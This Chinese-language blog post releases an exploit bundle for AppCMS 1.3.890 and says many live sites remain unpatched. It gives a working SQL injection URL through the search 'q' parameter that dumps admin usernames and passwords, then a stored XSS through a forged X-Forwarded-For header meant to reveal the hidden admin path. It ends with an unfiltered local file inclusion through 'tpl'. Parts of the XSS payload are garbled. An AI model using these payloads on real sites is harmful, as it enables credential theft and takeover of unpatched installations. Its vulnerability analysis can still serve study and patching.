AppCMS注入及xss漏洞大礼包exp,可打后台密码及地址

#############################
# by phithon
http://www.leavesongs.com
#############################

发乌云厂家不确认,官网的漏洞补了,不过还有很多站漏洞依旧存在。干脆给各位法克的同学学习了。
希望大家认真的看完,并不止于使用exp。看完对你以后的测试一定有启发。我不喜欢隐藏或收费,有钱的捧个钱场,没钱的捧个人场~哈哈

0x01 SQL注入原理

下载最新版本appcms_1.3.890。
查看index.php,有一段似乎是限制了搜索词的代码:
[php] if (!preg_match("/^[\x{4e00}-\x{9fa5}\w {0}]+$/u", $_GET['q'])) {
die('搜索词只允许下划线,数字,字母,汉字和空格,请重新输入。点此回到首页');
} [/php\
所以当我们在首页搜索含有’的关键词时会有提示:
[php]搜索词只允许下划线,数字,字母,汉字和空格,请重新输入[/php]
但我们往前看,却发现了一段输出ajax的代码,这时候并没有过滤……所以注入由此产生:
[php]
//ajax请求联想关键字
if (trim($_GET['q']) != '' && !isset($_GET['tpl'])) {
$str = '';
$sql = "SELECT app_id,app_title,app_down FROM " . TB_PREFIX . "app_list WHERE app_title LIKE '%" . trim($_GET['q']) . "%' LIMIT 15";
$app_list = $dbm ->query($sql);
if (count($app_list['list']) > 0) {
foreach ($app_list['list'] as $k => $v){
$app_list['list'][$k]['app_title'] = helper :: utf8_substr($v['app_title'], 0, 20);
}
echo json_encode($app_list['list']);
exit;
} else {
exit;
}
}[/php]
当$_GET[‘q’]非空且$_GET[‘tpl’]为空时进入这个IF,因为刚才我们搜索的时候参数是这样:?tpl=search&q='sd,所以才没有进入这个if。
我们看到这个if语句中,直接把trim($_GET[‘q’])带入了select语句,造成了注入。
给出利用exp:[php]
index.php?q=xxoo'union select 1,uname,upass from appcms_admin_list where uid like '[/php]
不过爆出了管理员密码也有点鸡肋,因为这个cms强制让用户修改后台地址。所以,我们需要想点方法弄到后台地址。于是,下面这个xss由此产生。

0x02 XSS原理

comment.php 获得IP地址,并插入数据库:
[php]
/**
* 获取客户端IP地址
*/
public static function getip() {
$onlineip = '';
if (getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
$onlineip = getenv('HTTP_CLIENT_IP');
} elseif (getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
$onlineip = getenv('REMOTE_ADDR');
} elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
$onlineip = $_SERVER['REMOTE_ADDR'];
}
return $onlineip;
}[/php]
当HTTP_X_FORWARDED_FOR存在时获取的IP就是它,但是HTTP_X_FORWARDED_FOR是可以伪造的,所以造成了XSS代码的注入。
但在数据库中,ip这个字段限制了字数,只有20字,所以绕过成为了难点。

所以我们来构造。
首先留一条言,内容是我们要写的xss代码,我这里就简单的弹出窗口:
[php]**/alert(/xss)/**[/php]
发表的时候抓包,修改X-FORWARDED-FOR,写半个闭合的script:
[php]X-FORWARDED-FOR:/

[/php]
0x03 LFI
除了上面两个已经成功的漏洞以外,index.php里还存在一个本地文件包含,不过需要进行截断。
[php]
if (substr($tpl, strlen($tpl)-4, 4) == '.php') {
$tmp_file = '/templates/' . $from_mobile . '/' . $tpl;
} else {
$tmp_file = '/templates/' . $from_mobile . '/' . $tpl . '.php';
}
if (!file_exists(dirname(__FILE__) . $tmp_file)) die('模板页面不存在' . $tmp_file);
require(dirname(__FILE__) . $tmp_file);[/php]
判断后缀是不是php,如果不是就加上.php,然后判断文件是否存在,进行包含。并没有任何过滤。其中最初的这个$tpl就是$_GET['tpl']。

发表评论